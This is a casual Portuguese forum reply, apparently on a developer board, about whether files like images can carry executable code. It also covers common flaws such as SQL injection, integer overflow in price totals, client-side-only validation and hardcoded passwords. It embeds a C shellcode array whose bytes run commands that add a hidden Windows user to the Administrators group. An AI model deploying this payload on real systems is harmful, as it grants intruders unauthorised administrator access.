[quote=Mark_Ameba]Tipo mandar uma foto mas na verdade é um executavel?
Impossivel, o maximo que voce pode fazer é gerar um exe que execute o código e abra a foto. Mas a extensão vai ser suspeita.
Eu por exemplo não abriria.[/quote]
Qualquer coisa pode ser executável… até um arquivo de texto… não existe diferença entre bits no computador…
char code[] = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\
"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\
"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\
"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\
"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\
"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\
"\x4e\x41\x4d\x45\x4e";
Se um trecho de código for inserido em uma imagem, mp3, arquivo texto ou seja lá o que for… e alguma aplicação estiver vulnerável… já era…
Já vi emails e imagens que só de visualizar a pessoa já era infectada… mas descobrir essas vulnerabilidade, aí já é outros quinhentos…
Inserir esses códigos em imagem não adiantaria porque a compactação de imagem ou som tende a eliminar bytes… teoricamente deveria descobrir como funciona a estrutura e o algoritmo e assim tentar encaixar os mesmos em algum lugar imutável e ainda descobrir alguma vulnerabilidade na aplicação…
Na verdade a maioria das pessoas nunca se preocupam com segurança de código e se o projeto está atrasado é sql injection, buffer overflow e toneladas de vulnerabilidades… já vi até gente colocando senha e password em código java… ou em flash… aí já viu né… o bando de dados ficava com o desempenho lá nas nuvens e ninguém sabia o porque…
O problema é que segurança de código é algo extremamente complexo, pois precisaria calcular o ponto ótimo para ver se valeria a pena fazer código seguro ou não… código seguro leva muito tempo para fazer e isto iria deixar inviável o custo de desenvolvimento…
Tem casos de pessoas que exploraram até vulnerabilidades de inteiros(isso em C/C++, pois como sabemos C/C++ libera tudo para liberal performance)… e no caso se calcularmos o imposto baseado em 2 entradas, o “hacker” poderia comprar 4.294.967.295 de mercadorias e somar com + R$ 100 dele e isso poderia fazer as mercadorias estourarem o limite e forçar o preço real lá para baixo… agora vai ver se alguém fica impondo limites de entrada nas aplicações… :lol: :lol: :lol:
O mais legal são aqueles que fazem checagem só com JavaScript… e nem sabe que qualquer Ráker de araque que conheça o protocolo Http poderia enviar diretamente os valores diretamente para o servidor… aí já viu né… o famoso Ráker(na verdade na maioria dos casos seria um funcionário da empresa ou aquele carinha que toma conta e tem senha de admin da hospedagem)… e então roda um java decompiler e fica analisando o código… e descobre que a classe de cálculo de pagamento soma duas entradas em primitivos integer… aí o Ráker fica imaginando o que aconteceria se ele comprasse 4.294.967.295 itens mais 10 ou 100 de outro campo…
Afinal esses negócios caem na prova SCJP… eu nem me lembro direito… mas acho que na minha caiu algo como o que aconteceria se somasse 4.294.967.295 + 4.294.967.295 ou no caso do Java que não tem unsigned 2 bilhoes + 2 bilhões…
Na última prova SCJP6… até incluíram casos de encode… tipo os famosos “> <”… rs… porque tem gente que teima em pegar campos de variáveis para montar a página… aí já viu a nheca que pode dar… :twisted: :twisted: :twisted: